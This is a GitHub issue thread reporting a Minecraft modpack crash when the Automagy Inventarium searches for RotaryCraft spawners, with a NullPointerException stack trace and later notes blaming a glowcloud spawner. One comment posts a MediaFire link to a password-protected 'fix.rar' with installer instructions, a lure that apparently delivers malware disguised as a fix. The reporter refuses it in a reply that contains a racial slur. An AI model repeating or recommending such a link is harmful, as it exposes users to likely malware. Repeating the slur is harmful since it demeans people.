### ISSUE TITLE
[dragon realm] crash when searching for rotarycraft spawners in the automagy inventarium

### ISSUE THREAD

**Issue by hacker-on-steroids** [ReikaKalseki/Reika_Mods_Issues#3403]
only seems to happen when the search finds the spawners - going through the pages manually without searching doesn't crash

```
[18:32:53] [Client thread/FATAL]: Reported exception thrown!
net.minecraft.util.ReportedException: Rendering screen
	at net.minecraft.client.renderer.EntityRenderer.func_78480_b(EntityRenderer.java:1391) ~[blt.class:?]
	at net.minecraft.client.Minecraft.func_71411_J(Minecraft.java:1001) ~[bao.class:?]
	at net.minecraft.client.Minecraft.func_99999_d(Minecraft.java:898) [bao.class:?]
	at net.minecraft.client.main.Main.main(SourceFile:148) [Main.class:?]
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[?:1.8.0_392-392]
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) ~[?:1.8.0_392-392]
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:1.8.0_392-392]
	at java.lang.reflect.Method.invoke(Method.java:498) ~[?:1.8.0_392-392]
	at net.minecraft.launchwrapper.Launch.launch(Launch.java:135) [launchwrapper-1.12.jar:?]
	at net.minecraft.launchwrapper.Launch.main(Launch.java:28) [launchwrapper-1.12.jar:?]
	at org.prismlauncher.launcher.impl.StandardLauncher.launch(StandardLauncher.java:88) [NewLaunch.jar:?]
	at org.prismlauncher.EntryPoint.listen(EntryPoint.java:126) [NewLaunch.jar:?]
	at org.prismlauncher.EntryPoint.main(EntryPoint.java:71) [NewLaunch.jar:?]
Caused by: java.lang.NullPointerException
	at cpw.mods.fml.common.registry.EntityRegistry.lookupModSpawn(EntityRegistry.java:338) ~[EntityRegistry.class:?]
	at Reika.DragonAPI.Libraries.ReikaEntityHelper.getEntityDisplayName(ReikaEntityHelper.java:857) ~[ReikaEntityHelper.class:?]
	at Reika.DragonAPI.Libraries.ReikaSpawnerHelper.generateSpawnerTooltip(ReikaSpawnerHelper.java:98) ~[ReikaSpawnerHelper.class:?]
	at Reika.DragonAPI.Extras.ItemSpawner.func_77624_a(ItemSpawner.java:44) ~[ItemSpawner.class:?]
	at net.minecraft.item.ItemStack.func_82840_a(ItemStack.java:525) ~[add.class:?]
	at tuhljin.automagy.gui.GUIScribe.updateStacksDisplay(GUIScribe.java:233) ~[GUIScribe.class:?]
	at tuhljin.automagy.gui.GUIScribe.func_73863_a(GUIScribe.java:379) ~[GUIScribe.class:?]
	at net.minecraft.client.renderer.EntityRenderer.func_78480_b(EntityRenderer.java:1357) ~[blt.class:?]
	... 12 more
[18:32:54] [Client thread/INFO] [STDOUT]: [net.minecraft.client.Minecraft:func_71377_b:349]: ---- Minecraft Crash Report ----
// Who set us up the TNT?
Time: 8/26/24 6:32 PM
Description: Rendering screen
java.lang.NullPointerException: Rendering screen
	at cpw.mods.fml.common.registry.EntityRegistry.lookupModSpawn(EntityRegistry.java:338)
	at Reika.DragonAPI.Libraries.ReikaEntityHelper.getEntityDisplayName(ReikaEntityHelper.java:857)
	at Reika.DragonAPI.Libraries.ReikaSpawnerHelper.generateSpawnerTooltip(ReikaSpawnerHelper.java:98)
	at Reika.DragonAPI.Extras.ItemSpawner.func_77624_a(ItemSpawner.java:44)
	at net.minecraft.item.ItemStack.func_82840_a(ItemStack.java:525)
	at tuhljin.automagy.gui.GUIScribe.updateStacksDisplay(GUIScribe.java:233)
	at tuhljin.automagy.gui.GUIScribe.func_73863_a(GUIScribe.java:379)
	at net.minecraft.client.renderer.EntityRenderer.func_78480_b(EntityRenderer.java:1357)
	at net.minecraft.client.Minecraft.func_71411_J(Minecraft.java:1001)
	at net.minecraft.client.Minecraft.func_99999_d(Minecraft.java:898)
	at net.minecraft.client.main.Main.main(SourceFile:148)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at net.minecraft.launchwrapper.Launch.launch(Launch.java:135)
	at net.minecraft.launchwrapper.Launch.main(Launch.java:28)
	at org.prismlauncher.launcher.impl.StandardLauncher.launch(StandardLauncher.java:88)
	at org.prismlauncher.EntryPoint.listen(EntryPoint.java:126)
	at org.prismlauncher.EntryPoint.main(EntryPoint.java:71)
```
can provide moar logs

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by hacker-on-steroids** [comment]
i aint clickin that shit nigga

more info: seems to be caused by this specific spawner - found it under one of the thaumcraft obelisk things, most of em have wisps but one had a glowcloud
![image](https://github.com/user-attachments/assets/02b08336-be11-4d65-96d9-4fc6a30a5686)
![image](https://github.com/user-attachments/assets/8cced024-1f3a-4a16-b609-5ecec1b0d8ea)
